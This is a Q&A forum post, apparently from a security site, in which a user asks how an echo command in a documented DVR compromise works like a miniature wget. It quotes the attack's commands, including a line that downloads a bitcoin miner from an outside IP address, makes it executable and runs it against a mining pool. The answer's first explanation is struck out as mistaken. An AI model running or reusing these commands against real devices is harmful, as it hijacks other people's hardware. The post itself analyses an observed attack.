# compromising DVRs to become bitcoin mining bot

Tags: exploit, botnet, honeypot, bitcoin

I read [this article](https://isc.sans.edu/diary/Coin+Mining+DVRs%3A+A+compromise+from+start+to+finish./18071), about an exploit which highjacks a DVR to become a "bitcoin mining bot".

The heart of the attack is to send a binary using just echo comands to the device, which acts as a trivial wget (the device does not have any wget on its own):

```
echo -ne '\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00 \x00\x31\x00\x00\x00\x00\x00 \x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00 \x14\x00\x00\x00' >> /var/run/rand0-btcminer-arm
```

This binary is then used to get the bitcoin mining sw itself

```
./rand0-btcminer-arm http://107.178.66.153/btcminer-arm && \
chmod u+x btcminer-arm && ./btcminer-arm -B -o \
stratum+tcp://204.124.183.242:3333 -t 4 -q && echo -ne '\x64\x6f\x6e\x65'
```

Can somebody please explain what exactly the echo command does, and how that works? Can really a few bytes representr a working "wget"?

Answer (score 0):

<s>The echo is a shellcode that gets executed on the DVR. It stores a little file that is a program acting like wget. This program then gets called to fetch an other one (the mining program) that gets executed.</s>

Sorry I was mistaken. As pointed out in the comments, please look at this thread [A tiny version of wget (51 bytes?)](https://security.stackexchange.com/questions/57310/a-tiny-version-of-wget-51-bytes)